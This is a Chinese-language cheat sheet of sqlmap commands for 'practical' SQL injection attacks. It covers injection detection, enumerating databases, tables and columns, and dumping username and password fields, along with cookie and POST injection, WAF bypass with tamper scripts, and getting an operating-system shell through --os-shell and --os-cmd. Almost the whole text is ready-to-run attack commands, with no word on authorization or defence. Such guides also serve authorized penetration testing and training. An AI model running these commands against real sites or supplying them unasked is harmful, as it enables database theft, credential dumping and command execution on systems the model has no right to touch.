说明

本文主要讲一下sqlmap在实战中的一些技巧

注入检测

检测注入

sqlmap.py -u http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 --batch 

参数“–batch”命令来自动答复y或n。

批量检测

sqlmap.py-m url.txt 

常用注入方法

1.ACCESS数据库注入：

sqlmap.py -u “url” /*-u为常规扫描参数*/  sqlmap.py -u “url” –tables /*–tables拆数据库表*/  sqlmap.py -u “url” –columns -T “要拆的表名”/*列出指定表名*/  sqlmap.py -u “url” –dump -T “要拆的表名”-C “要拆的字段名” /*–dump为拆解字段名会保存在sqlmap/output目录下*/ 

2.MYSQL数据库注入：

sqlmap.py -u “url” /*扫描注入点*/  sqlmap.py -u “url” –dbs /*列出所有数据库*/  sqlmap.py -u “url” –current-db /*列出当前数据库*/  sqlmap.py -u “url” –current-user /*列出当前用户*/  sqlmap.py -u “url” –tables -D “当前数据库名” /*拆解当前数据库表*/  sqlmap.py -u “url” –columns -T “要拆得的表名” -D “当前数据库名” /*拆解指定表字段名*/  sqlmap.py -u “url” –dump -C “字段名” -T “表名” -D “当前数据库” 

3.mssql数据库：

同MYSQL

4.COOKIE注入：

sqlmap.py -u “www.xxx.com/asp或者www.xxx.com/php”?–cookie “参数名如id=1” –level 2/*level为级别，不同级别检测的不一样*/ 

5.POST注入：

抓包保存到SQLMAP目录下.txt的文件然后输入指令sqlmap.py -r xxx.txt /*xxx.txt为保存包文件的文件名”

sqlmap.py -u “url” –data “POST参数” 

6.执行shell命令：

sqlmap.py -u “url” –os-cmd=”net user” /*执行net user命令*/  sqlmap.py -u “url” –os-shell /*系统交互的shell*/ 

7.注入HTTP请求 :

sqlmap.py -r xxx.txt –dbs /*xxx.txt内容为HTTP请求*/ 

8.绕过WAF的tamper插件使用：

sqlmap.py -u “url” –tamper “xxx.py” 

9.sqlmap自动填写表单注入：

sqlmap.py -u URL –forms  sqlmap.py -u URL –forms –dbs  sqlmap.py -u URL –forms –current-db  sqlmap.py -u URL –forms -D 数据库名称–tables  sqlmap.py -u URL –forms -D 数据库名称 -T 表名 –columns  sqlmap.py -u URL –forms -D 数据库名称 -T 表名 -Cusername，password –dump 

10.延时注入：

sqlmap –dbs -u “url” –delay 0.5 /*延时0.5秒*/  sqlmap –dbs -u “url” –safe-freq /*请求2次*/ 

实战使用

列出全部数据库

sqlmap -u ” http://127.0.0.1/web.php?id=1 ”  --dbs 

列出 web1库的全部表

sqlmap -u ” http://127.0.0.1/web.php?id=1  ”  -D web1 --tables 

列出user表全部字段

sqlmap -u ”  http://127.0.0.1/web.php?id=1 ”  -D web1 -T user --columns 

跑指定字段的数据

sqlmap -u ” http://127.0.0.1/web.php?id=1 ”  -D web1 -T user -C ‘name,username,passwd’ --dump